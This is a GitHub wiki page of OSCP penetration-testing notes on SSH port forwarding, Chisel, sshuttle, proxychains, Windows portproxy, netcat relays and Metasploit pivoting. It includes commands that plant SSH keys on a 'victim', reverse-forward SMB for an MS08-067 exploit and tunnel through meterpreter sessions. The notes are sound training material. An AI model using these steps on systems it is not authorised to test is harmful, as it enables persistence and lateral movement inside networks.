SSH & Chisel & Pivoting - A1vinSmith/OSCP-PWK GitHub Wiki
ssh [email protected] -t bash
# Send .sh
scp LinEnum.sh user@$ip:/tmp
# Get file
scp file.txt [email protected]:/remote/directory
scp file <remote_username>@<IPorHost>:<PathToFile> <LocalFileLocation>
# In victim
ssh-keygen -t rsa
cat id_rsa.pub > authorized_keys
chmod 600 authorized_keys
# In attacker, copy and create the private key to id_rsa
ssh [email protected] -L 8080:127.0.0.1:8086 -i id_rsa
# open your browser http://localhost:8080/ OR nmap -A -p8080 -v 127.0.0.1
ls -lh /etc/ssh/sshd_config
Try su denyUser instead
~C
then do a forwarding port
ssh> -L 8443:127.0.0.1:8443
Forwarding port.
https://www.youtube.com/watch?v=Yp4oxoQIBAM&t=1469s
git clone [email protected]:jpillora/chisel.git
go build -ldflags="-s -w"
upx brute chisel
du -hs chisel # See the size
https://0xdf.gitlab.io/2019/01/28/pwk-notes-tunneling-update1.html
https://gist.github.com/grantpullen/5a1c79a4e4a28e3b1d66ae17c8a9eb61
- https://pswalia2u.medium.com/ssh-tunneling-port-forwarding-pivoting-socks-proxy-85fb7129912d
- https://linuxize.com/post/how-to-setup-ssh-tunneling/
Forwarding and Pivoting can be a confusing topic. I still get headache's sometimes trying to keep track of what i did to get to this port, and how im gonna get a reverse shell back to that subnet and whatnot. This is just a quick writeup attempting to show the differences in the main types of forwards and pivots, as well as what works for me.
For the purpose of this tut, im gonna set a few static ip's that ill stick with til the end
LHOST = 192.168.1.1 TARGET = 192.168.1.2 RHOST = 192.168.0.3
-f # Backgrounds ssh as well as its output -N # Don't execute a remote command (shell), just forward the port. If you use this option, you won't be logging into an ssh session also. -L # Local (Grab a port/service) -R # Reverse/Remote (Send a port/service) -D # Dynamic (Pivot)
-Local (-L) This command will grab the webserver on port 80 of RHOST (which you can't access normally) and forward it to 8888 of localhost, using TARGET as a proxy
$ ssh -f -N -L 8888:192.168.0.3:80 [email protected]
Now if we curl 127.0.0.1:8888 we get RHOST's webserver
-Reverse (-R) This does the complete opposite of -L. Instead of grabbing a remote port and binding it to a local interface, it takes a local service/port and sends it to a remote host. Let's say ur testing a network with an XP box. You know it's vulnerable to MS08-067 but 445 and 139 are filtered or blocked by the firewall. You get a limited shell but you really can't do anything with it.
From the TARGET box
$ ssh -f -N -R 44544:127.0.0.1:445 [email protected]
This is going to open an ssh session from TARGET to our local Kali (or whatever distro) box and bring port 445 along for the ride. Now we can access it's SMB service on 127.0.0.1:44544 and one-click pwn it with MS08.
-Dynamic (-D) Dynamic takes an unused port and forwards it on an application level thru TARGET's ssh server. This mean's instead of grabbing or sending a server, we're basically turning TARGET into a network interface for US.
$ ssh -f -N -D local_port [email protected]
This will create a socks proxy on 127.0.0.1:local_port , forward it to TARGET's ssh server, and out the other side. Giving us access to any additional resources and subnets that TARGET has access to. Now we can forward any program through the socks proxy with proxychains just like we're on the local network.
# Change to 1085 for THM Capstone
# socks4 127.0.0.1 1085
socks5 127.0.0.1 1085
-Proxychains(-ng) https://github.com/rofl0r/proxychains-ng.git
Proxychains is a quick way to send any command or program through a socks or http proxy. I personally like proxychains-ng/proxychains4 because it lets you specify your config file. Generally if i'm workin on something, i create a project folder for it, so i'll just copy the config file into the folder and run it from there. Regular proxychains just uses /etc/proxychains.conf.
If you're using proxychains with a socks proxy like this, just open the config, comment out "Dynamic Chain", uncomment "Strict Chain", scroll to the bottom and edit or create a socks5 proxy so it looks like this
[ProxyList]
# add proxy here ...
socks5 127.0.0.1 44544
Now i can $ proxychains-ng -f proxychains.conf -q nikto -h 192.168.0.3 8080 And it'll forward it through the tunnel to RHOST. -f tells it to use THIS config file -q means quiet. it redirects all the proxychains status messages which can get way outta hand when your running any kind of scan.
SSHPass # https://sourceforge.net/projects/sshpass/ is just a simple program that accepts your ssh password so you don't get prompted for it later. It's especially useful for creating bash aliases (IMO)
SSHuttle # https://github.com/apenwarr/sshuttle.git works more like a vpn than proxy. You tell it what machines and subnets you want to forward through the ssh tunnel, and anything you point at those machines will now be forwarded through the tunnel
$ sshpass -pMYPASSWORD sshuttle -r [email protected] 192.168.0.0/24 10.0.0.0/24
This will take any future traffic i point at 192.168.0.0/24 or 10.0.0.0/24 subnets and automatically forward them for me. No need for proxychains or anything else. I can just $ curl 192.168.0.3 like i was part of the local subnet
sshpass -p # insert password sshuttle -r # remote ssh server (if you need a different ssh port, you enter it like [email protected]:2222)
$ netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=3389 connectaddress=10.1.1.24
This will set windows to listen on 8080 and redirect all traffic to 10.1.1.24 on 3389. You need admin privileges on the windows box to do this, and also you can use v6tov4 and v4tov6
On Victim
$ mknod backpipe p
$ nc -l -p 8080 0<backpipe | nc 10.1.1.24 3389 | tee backpipe
This will do the same. Creates a listener on port 8080, and forwards all incoming traffic to 10.1.1.24 on port 3389 (RDP)
So there's a cpl different ways to go about this depending on whether you created your tunnel inside metasploit or not
If you made it with standard ssh or sshuttle...... Most exploits and alot of the scanners inside metasploit offer "Proxies" as an option. Sometimes you gotta "Show Advanced" to see it. If i had a dynamic forward setup, I would
$ set proxies socks5:127.0.0.1:44544
$ set ReverseAllowProxy True
^^^^ Reverse shells won't connect back through a proxy, this attempts to give them directions back home to connect to your ip address.
Another way would be to skip the proxy, forward the remote port that you need to your local port 8888 with -L, and
$ set RHOST 127.0.0.1
$ set RPORT 8888
Another way would be to just proxychains the msfconsole.
Or you can just use sshuttle, this forwards everything including metasploit.
<><><><><>
On the flipside, Metasploit is also great at creating tunnels.
If instead of ssh creds, you have a meterpreter shell, this options perfect If you're meterpreter session is Session 1 for instance. Inside metasploit, do
$ route add 192.168.0.0 255.255.255.0 1
that will forward all metasploit traffic pointed at 192.168.0.0/24 through Session 1.
You can also make this happen automatically by loading the auto_add_route plugin ($ load auto_add_route) This will automatically check the subnets in ur new meterp shells and forward traffic through it if you can't already reach it.
Meterpreter also offers portfwd as an option inside the shell. The syntax is pretty much the same as with SSH.
And if you need to access your metasploit pivots/forwards outside of metasploit...
$ use auxiliary/server/socks4a
$ set srvhost 127.0.0.1
$ set srvport 1080
$ run
This will create a socks4 proxy on 127.0.0.1:1080 outside of metasploit that uses the routes and forward's that you configured inside it. Just use proxychains like before